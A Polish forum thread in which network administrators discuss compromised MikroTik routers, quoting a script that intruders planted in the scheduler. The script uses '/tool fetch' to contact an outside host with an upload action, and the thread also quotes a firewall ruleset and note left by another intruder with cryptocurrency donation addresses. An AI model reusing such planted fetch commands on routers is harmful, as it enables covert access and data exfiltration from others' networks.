Trzepak.pl

Regulamin forum


Wypowiedzi muszą stosować się do zasad ogólnie przyjętej "netykiety" wynikającej z dokumentu RFC 1855, zamieszczonego pod tym adresem:
http://www.ietf.org/rfc/rfc1855.txt
Osoby wypowiadające się tu "zawodowo" proszone są o logowanie się swoim imieniem i nazwiskiem, a w stopce ich wypowiedzi wskazane jest przedstawienie danych adresowych łącznie z linkiem do strony głównej przedsiębiorstwa lub organizacji, którą reprezentują.
Umieszczanie informacji reklamowych w wypowiedzi i w stopce nie jest wskazane a moderatorzy mogą ingerować usuwając takie posty w sposób nie podlegający dyskusji.



Nowy temat  Odpowiedz w temacie
Autor Wiadomość
Post: pt, 13 lip 2018 21:05:52 
Odpowiedz z cytatem
Offline
Wyciszony literat
Wyciszony literat

Rejestracja: czw, 17 cze 2010 11:12:20
Posty: 799
Lokalizacja: RP
v6.42.1
dodany bez wiedzy usera skrypt


Kod:
{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=85454d8bb84998fa&action=upload&sncode=EDC1CBA34409097A7F3F5DA6DFFF2822&dynamic=static")}


ustawione jeszcze w scheduler

Nie ma dodatkowego, usera, ppp, usługi wyłączone oprócz winbox

_________________
Administrator sieci komputerowych


Na górę
Post: pt, 13 lip 2018 21:37:31 
Odpowiedz z cytatem
Offline
Powieściopisarz
Powieściopisarz

Rejestracja: śr, 27 sie 2008 12:30:17
Posty: 1632
Lokalizacja: szczecin
ja juz rozne kwiatki u siebie widzialem z mt...
dobrze ze hasel nie zmieniaja...

chyba btc kopia bo spora czesci na podkreconym procku chodzi..
mysle ze mikrotik bedzie jeszcze te dziury latal chwile, nie wie do konca gdzie jest problem

_________________
http://www.mierzyn.net - Internet Mierzyn


Na górę
Post: pt, 13 lip 2018 23:55:00 
Odpowiedz z cytatem
Offline
Powieściopisarz
Powieściopisarz

Rejestracja: wt, 17 lut 2009 1:37:06
Posty: 1800
Na GPU za 2k nie da się już kopać BTC a co dopiero na MT który ledwie Monero pewnie by wydobywał


Na górę
Post: sob, 14 lip 2018 5:30:04 
Odpowiedz z cytatem
Offline
Powieściopisarz
Powieściopisarz

Rejestracja: śr, 27 sie 2008 12:30:17
Posty: 1632
Lokalizacja: szczecin
zgadza sie :) ale chyba próbują na ilosc i darmowy prad bo innego wytlumaczenia nie widze

_________________
http://www.mierzyn.net - Internet Mierzyn


Na górę
Post: sob, 14 lip 2018 10:04:23 
Odpowiedz z cytatem
Offline
Powieściopisarz
Powieściopisarz

Rejestracja: śr, 27 sie 2008 12:30:17
Posty: 1632
Lokalizacja: szczecin
moj blad z tym kopaniem btc

dodany sysnote:
The security flaw for Hajime is closed by the firewall. Please update RotherOS. Gratitude is accepted on WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1

i firewall

/ip firewall address-list
add address=10.10.100.2 list=allow-ip
add address=192.168.88.0/24 list=allow-ip
/ip firewall filter
add action=tarpit chain=input comment="Add you ip addess to allow-ip in Address Lists." dst-port=30553 protocol=tcp
add action=add-src-to-address-list address-list=allow-ip address-list-timeout=1h chain=input comment="The security flaw for Hajime is closed by the firewall." packet-size=1083 \
protocol=icmp
add action=accept chain=input comment="Please update RotherOS and change password." src-address-list=allow-ip
add action=drop chain=input comment=" Thanks are accepted on WebMoney Z399578297824" dst-port=53 protocol=udp
add action=drop chain=input comment="or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1" dst-port=53,8728,8729,21,22,23,80,443,8291 protocol=tcp
add action=passthrough chain=input

oprocz niewlasciwego wykorzystania, ktos nam je zabezpiecza :)

_________________
http://www.mierzyn.net - Internet Mierzyn


Na górę
Post: sob, 14 lip 2018 11:01:48 
Odpowiedz z cytatem
Offline
Obsesyjny prozaik
Obsesyjny prozaik

Rejestracja: ndz, 19 lip 2009 10:41:45
Posty: 1118
viewtopic.php?p=491527#p491527

różne warianty tego samego :)


Na górę
Post: sob, 14 lip 2018 17:42:51 
Odpowiedz z cytatem
Offline
Fanatyczny prenumerator
Fanatyczny prenumerator

Rejestracja: pn, 23 mar 2009 10:31:14
Posty: 444
Tak i na sofcie w okolicy 6.38 nie ma mozliwosci wgrania jakiegokolwiek softu. Plik npk ulega autoskasowaniu.

Wysłane z mojego SM-G955F przy użyciu Tapatalka


Na górę
Post: ndz, 15 lip 2018 0:23:03 
Odpowiedz z cytatem
Offline
Czytelnik
Czytelnik

Rejestracja: pn, 02 lut 2015 20:46:49
Posty: 100
powerek pisze:
Tak i na sofcie w okolicy 6.38 nie ma mozliwosci wgrania jakiegokolwiek softu. Plik npk ulega autoskasowaniu.

Wysłane z mojego SM-G955F przy użyciu Tapatalka


To netinstall


Na górę
Wyświetl posty nie starsze niż:  Sortuj wg  
Nowy temat  Odpowiedz w temacie


Kto jest online

Użytkownicy przeglądający to forum: Obecnie na forum nie ma żadnego zarejestrowanego użytkownika i 8 gości


Nie możesz tworzyć nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz dodawać załączników

Szukaj:
Przejdź do:  
Dzisiaj jest pt, 16 lis 2018 7:00:47

Strefa czasowa UTC+02:00

Moderatorzy: Administratorzy, Moderatorzy

Nakarm glodne dziecko - wejdz na strone www.Pajacyk.pl


Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
SubSilver2 modified for Trzepak.pl by Colir
Polski pakiet językowy dostarcza phpBB.pl